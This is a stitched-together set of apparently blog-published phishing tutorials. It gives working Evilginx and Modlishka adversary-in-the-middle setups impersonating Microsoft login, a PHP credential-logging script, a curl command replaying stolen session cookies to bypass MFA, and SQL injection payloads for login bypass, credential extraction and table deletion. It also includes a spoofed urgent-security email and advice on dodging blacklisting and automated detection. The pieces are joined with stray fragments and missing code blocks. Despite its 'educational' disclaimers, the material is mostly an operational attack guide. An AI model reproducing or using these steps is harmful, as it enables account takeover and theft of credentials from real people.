Introduction

The landscape of phishing has evolved significantly from basic credential harvesting to more sophisticated methods. In this evolution, adaptive data harvesting techniques have become increasingly prevalent. This shift focuses not only on capturing static credentials like usernames and passwords but has grown to include session tokens and cookies that have already passed multi-factor authentication (MFA) checks. Such methods offer a higher success rate as they allow attackers to gain authenticated access without triggering additional security prompts or alarms. Understanding these advanced techniques is crucial for running more authentic and successful phishing simulations.

After going through this comprehensive guide, you’ll be equipped to set up and execute an Adversary-in-the-Middle (AiTM) proxy campaign using tools like Evilginx. You’ll learn how to create convincing cloned login pages and implement strategies for the exfiltration of session tokens that provide immediate and validated account access, bypassing the need for MFA. Ready to take your phishing simulations to the next level? Let’s dive in.

Prerequisites and Setup

Before you can undertake an effective credential capture operation, certain prerequisites need to be in place. The first is to secure a plausible-looking domain to act as a facade for your operation. Typosquatting on a known service provider is a classic technique. For instance, the domain accounts-microsoft-verify.com can mimic Microsoft’s services, providing a credible veneer. Additionally, having SSL via Certbot to encrypt your fake site traffic is vital. Also, ensure that you have access to a VPS where you can install and run Evilginx.

To set up Evilginx on a fresh Debian VPS, use the following commands:

apt update && apt install git golang-go -y

git clone https://github.com/kgretzky/evilginx2.git

cd evilginx2 && make

./bin/evilginx -p ./phishlets

After installation, configure Evilginx using its shell as follows:

config domain accounts-microsoft-verify.com

config ipv4 external 45.33.32.156

phishlets hostname o365 login.accounts-microsoft-verify.com

phishlets enable o365

With the basic setup in place, you’re prepared to execute a robust phishing campaign.

Step-by-Step Execution — AiTM Proxy with Evilginx

Configuring the phishlet

The first step in running an Evilginx AiTM campaign is configuring the right phishlet. Phishlets are templates for cloned login pages and can be customized for various services. The O365 phishlet serves as a fitting example, given its widespread use:

Creating and distributing lure URLs

Creating the lure URL is a pivotal step. This URL is what your targets will click on, thinking it’s a legitimate login page. Use the following Evilginx commands to create and retrieve your lure URL:

lures create o365

lures edit 0 redirect_url https://portal.office.com

lures get-url 0

The retrieved URL can be distributed through various means like spear-phishing emails or crafted messages that are more likely to result in a click-through.

Harvesting captured sessions

Once victims log in through the lure URL, Evilginx captures their session tokens. Here’s a sample of a captured session output in the Evilginx interface:

Token: XYZ123… | Username: john.doe@company.com | Timestamp: 2023-10-15 12:00:00

The value in this data is substantial because a session token allows you to impersonate the user without needing the password. This method completely sidesteps MFA requirements since the user has already been authenticated. Such tokens are a potent asset for an attacker, maximizing access while minimizing detection risk.

Step-by-Step Execution — Cloned Credential Pages

Cloning the target page

Sometimes a standalone credential harvester page is more practical. The first step is cloning the target login page. Using

, you can mirror the target’s legitimate login page:

wget --mirror --page-requisites --convert-links --no-parent https://login.microsoftonline.com/common/oauth2/authorize

This will fetch all necessary files to locally host a believable copy of the real login page.

Adding the credential capture backend

Once the page is cloned, incorporate a backend script to capture credentials. An example PHP script for logging credentials is as follows:

<?php

$log = fopen('/var/log/.harvest.log', 'a');

fwrite($log, date('Y-m-d H:i:s') . ' | ' . $_SERVER['REMOTE_ADDR'] . ' | ' . $_POST['login'] . ':' . $_POST['passwd'] . "\n");

fclose($log);

header('Location: https://login.microsoftonline.com/common/oauth2/authorize?error=invalid_request');

exit;

The strategy here uses a redirect to the legitimate site after capturing credentials, with a generic error message suggesting to the user they simply mistyped their login details. This redirection decreases suspicion, allowing users to input their details again on the real site, while your script quietly logs their credentials.

Advanced Variations

Modlishka as a Modular AiTM Alternative

If Evilginx doesn’t fit the specific needs of your campaign, Modlishka presents a modular alternative with more customization options. Configuring Modlishka involves creating a JSON configuration file matching your target:

{

  "proxyDomain": "login.microsoftonline-sso.com",

  "listeningAddress": "0.0.0.0:443",

  "target": "login.microsoftonline.com",

  "targetResources": ".microsoftonline.com,.live.com,.office.com",

  "trackingCookie": "id",

  "log": "/var/log/modlishka.log",

  "cert": "/etc/letsencrypt/live/login.microsoftonline-sso.com/fullchain.pem",

  "certKey": "/etc/letsencrypt/live/login.microsoftonline-sso.com/privkey.pem"

}

Session Token Replay

Once a session token is captured, you can directly replay it to gain access to the victim’s account, bypassing password and MFA. To verify the authenticity of a token, use:

curl -s -b "ESTSAUTH=eyJ0eXAiOiJKV1Qi..." \

  https://outlook.office.com/mail/ -L \

  | grep -i "displayName"

This method lets you test the token’s validity before proceeding with further stages of your campaign.

Good / Better / Best

Good: Implementing a static cloned page with a PHP credential logger is a functional approach. However, its effectiveness diminishes rapidly after the domain is reported and blacklisted. The prompt response teams of major service providers can quickly neutralize such sites.

Better: Deploying an Evilginx AiTM configuration elevates your game. This method not only captures credentials but also session tokens, bypassing MFA obstacles entirely. The setup can blend seamlessly with real web services, making detection considerably harder.

Best: Incorporating a pre-text traffic-qualifying mechanism adds another layer of sophistication. This entails redirecting traffic to a legitimate-seeming page first to filter out bots and scanners, allowing only human interactions to reach your Evilginx capture page. This pre-text strategy dramatically extends the operational lifespan of the domain by reducing exposure to automated detection systems.

Related Concepts

Adaptive data harvesting techniques are intricately linked to other areas in the phishing landscape. Concepts like AiTM phishing and session hijacking form the basis of such sophisticated campaigns. Additionally, strategies around payload delivery, command and control infrastructure, and proficient campaign management, including domain rotation, are essential for extending the reach and lifespan of these engagements.

References

• Evilginx GitHub
• Modlishka GitHub
• Microsoft Security Blog on AiTM Phishing

Related Reading

• Exploiting Out-of-bounds Write Vulnerabilities in Phishing Campaigns
• Crafting Phishing Emails: Techniques and Tactics

Educational Purpose: This content is provided for awareness and defensive purposes only. Understanding attacker methodologies helps individuals and organizations protect themselves.

“`

Understanding SQL Injection for Data Harvesting

SQL injection is a code injection technique that exploits vulnerabilities in an application’s software by inserting malicious SQL statements into an entry field for execution. For phishing campaigns, this method allows attackers to access sensitive data, such as usernames, passwords, and financial information, that would normally be protected.

SQL injection vulnerabilities allow attackers to communicate directly with an application’s database, often extracting, altering, or corrupting data.

To effectively use SQL injection in your phishing simulations, it’s crucial to fully understand the database structure and exploit it without tipping off the target during the engagement. This technique requires precision and subtlety to avoid detection.

Exploiting Vulnerabilities: Step-by-step Approach

The key is to mimic the way a genuine attacker would operate, taking advantage of existing vulnerabilities and delivering the simulated attack in a plausible context. Let’s delve into a step-by-step approach.

1. Identify and Probe SQL Injection Entry Points

Start by identifying potential entry points in your target’s web application. These might include login forms, search boxes, or data entry fields where user inputs are expected. Conduct a reconnaissance to find fields not properly sanitized.

POST /login HTTP/1.1

Host: securetarget.com

Content-Type: application/x-www-form-urlencoded

Content-Length: 80



username=admin' OR '1'='1&password=wrongpassword&submit=Login

The example above shows how you could bypass authentication using a common SQL Injection payload, simulating an attacker’s attempt to exploit a login page vulnerability.

2. Exploit the Vulnerability

Once an entry point is identified, craft your SQL injection statement to extract desired data specifically. Tailor the payload to access data stealthily, such as customer information or internal credentials stored in the database, by leveraging union-based SQL injection for data extraction.

' UNION SELECT username, password FROM users --

Using this query, an attacker would attempt to retrieve usernames and passwords from a vulnerable database, simulating unauthorized data access.

Good / Better / Best Execution Strategies

• Good: Initiate the attack by embedding basic SQL injection scripts in poorly sanitized input fields, revealing minimal data but confirming the vulnerability’s existence.
• Better: Tailor SQL queries to extract specific data fields such as full names, email addresses, and hashed passwords, providing a clearer demonstration of the potential impact.
• Best: Combine SQL injection with subtlety and sophisticated pretexting to extract comprehensive data sets, using social engineering to engage targets and avoid security triggers.

Related Concepts

Understanding SQL injection vulnerabilities is part of broader categories essential in today’s security landscape. Concepts like information retrieval via AiTM (Adversary-in-The-Middle) attacks and credential hijacking through phishing platforms complement your toolkit. Click here for additional information on known vulnerabilities.

References

• CISA Known Exploited Vulnerabilities Catalog

Related Reading

• Exploiting BerriAI LiteLLM SQL Injection Vulnerability for Unauthorized Access
• What is SQL Injection?
• Adaptive Data Harvesting Techniques Leveraged in Phishing Campaigns
• Exploiting Out-of-bounds Write Vulnerabilities in Phishing Campaigns

Educational Purpose: This content is provided for awareness and defensive purposes only. Understanding attacker methodologies helps individuals and organizations protect themselves.

The Subtle Art of SQL Injection

SQL injection is a technique that allows malicious actors to execute arbitrary SQL code on a database, potentially leading to unauthorized access to sensitive data. By inserting or “injecting” SQL queries into input fields that are directly tied to the backend database, attackers can manipulate the responses from a website or web application. When you incorporate SQL injection into a phishing campaign, you not only test the user’s awareness but also probe the backend infrastructure for exploitable vulnerabilities.

SQL injection in the context of phishing leverages user engagement to tap into underlying data structures, thereby enlarging the threat landscape beyond the inbox.

Exploitation Example: BerriAI LiteLLM

When targeting databases in phishing campaigns, an exploit against known vulnerabilities such as those documented in the CISA Known Exploited Vulnerabilities Catalog, including the BerriAI LiteLLM, can be particularly beneficial. An actual phishing email might appear as:

Subject: Critical Update on Your Account

From: security-updates@corp-email.update-secure.net

Body: 

Dear User, 



We have detected unusual activities on your account. Kindly log in to verify your information to ensure uninterrupted service. Please follow the secure link below:



<a href="https://login-corp-secure.net.verify-update.com/login">Verify Your Account</a>



Thank you,

Security Team

The link routes the recipient to a site containing a vulnerable input field, allowing attacker-injected SQL queries to retrieve stored user credentials and sensitive information.

Technique Execution: Building a Phishing Campaign for Data Harvesting

Develop a campaign that not only captures user credentials through crafted pages mimicking legitimate login portals but also exploits SQL vulnerabilities to gather data from the associated databases. Here’s a breakdown of the process:

Crafting the Lure

The deception begins with an email designed to avoid suspicion and encourage the recipient to interact with an input field. The sender’s address uses address spoofing techniques to appear authentic, while the subject line and message body utilize psychological triggers such as urgency or authority — common tactics in phishing attacks.

A well-designed phishing email exploits human psychology and creates a seemingly real scenario where engagement feels necessary.

Leveraging Vulnerabilities

Once the link is clicked, the goal is to exploit known vulnerabilities by manipulating input fields. Here’s a realistic SQL injection command targeting a login page:

' OR 1=1; DROP TABLE users; --

While the above is a destructive query intended to show the potential of SQL injection, in a simulation, we’d extract data in a stealth manner, focusing on data harvesting like retrieving user profiles or credential hashes.

Do’s and Don’ts

Do’s

• Do research: Identify web applications with documented vulnerabilities, ensuring they align with known exploits.
• Do craft plausible emails: Mimic actual correspondence templates and language used within the target organization.
• Do test extensively: Conduct dry-runs to ensure the SQL injection payload retrieves the intended data without causing suspicion or immediate alert.

Don’ts

• Don’t use overly intrusive queries: These can break functionality and alert both users and administrators to potential breaches.
• Don’t ignore user engagement signals: If an approach fails to lure users into clicking on your links or entering information, it diminishes the chance of successful exploitation.

Related Concepts

• Ethical Use of Vulnerabilities: Leveraging known weaknesses in a controlled setting to secure client infrastructure rather than inflict damage.
• Advanced Social Engineering: Combining technical exploits with human factors to increase the rate of successful engagements.
• Comprehensive Data Harvesting: The ultimate goal is to not just retrieve credentials but also understand user behaviors for long-term gains.

References

• CISA Known Exploited Vulnerabilities Catalog

Related Reading

• Credential Harvesting Made Easy
• Where Do Email Lists Come From?
• Exploiting Improper Input Validation for Social Engineering Attacks
• Pick Your Poison

Educational Purpose: This content is provided for awareness and defensive purposes only. Understanding attacker methodologies helps individuals and organizations protect themselves.

Tools & Materials

To set-up this credential trap, you will need a text editor and a web server. We wouldn’t recommend using anything production-quality as publicizing a credential trap will likely get your domain flagged for suspicious content.

That said, at your own risk.

Sample Code?

Yes, you may find our basic cred-trap, along with other materials from this site, on our GitHub:
https://github.com/PhishAndChips-io/cred-trap

How does it work?

The primary payload is index.html.
You can see a LIVE version here:
https://phishandchips.io/static/cred-trap/

There’s a lot to unpack here.. so let’s go through it.

here, we have some social engineering at play…

1. We have a timer (written in javascript) that says you have 00:30s to act quickly.
2. We have some reassuring message from your IT department–“We’ve added this for your safety“
3. We have a friendly placeholder in the template for a logo as well as a FAVICON— you know, for the really authentic experience.

Behind the Scenes…

Here is our form.. all it’s doing is passing the username and password fields to our submit.php… this file can be hosted anywhere, and if you’re into Evasion, you will place it far away from your index.

Second… check out this countdown timer:

This is pretty boiler-plate stuff… At the end of the countdown, we set the redirect URL to: https://portal.microsoft.com, which should be a login page for Microsoft— this is to simulate “oops, you’ve been logged out”

*NOTE.. if you’re not good with code, you can always ask ChatGPT

Let’s see submit.php

Short story goes… we just receive a POST to page, open data.txt, write the form contents, then redirect the user to portal.microsoft.com anyway–

And that’s it…

The output:

Conclusion

As we have demonstrated… it’s absolutely trivial to create a web form to harvest credentials. Login forms do not actually need to go anywhere or do anything to be effective. With 2x files and 30 lines of code (excluding styles and javascript), we can create an effective credential trap… small, but optional, embellishments complete the social engineering piece.

What’s next?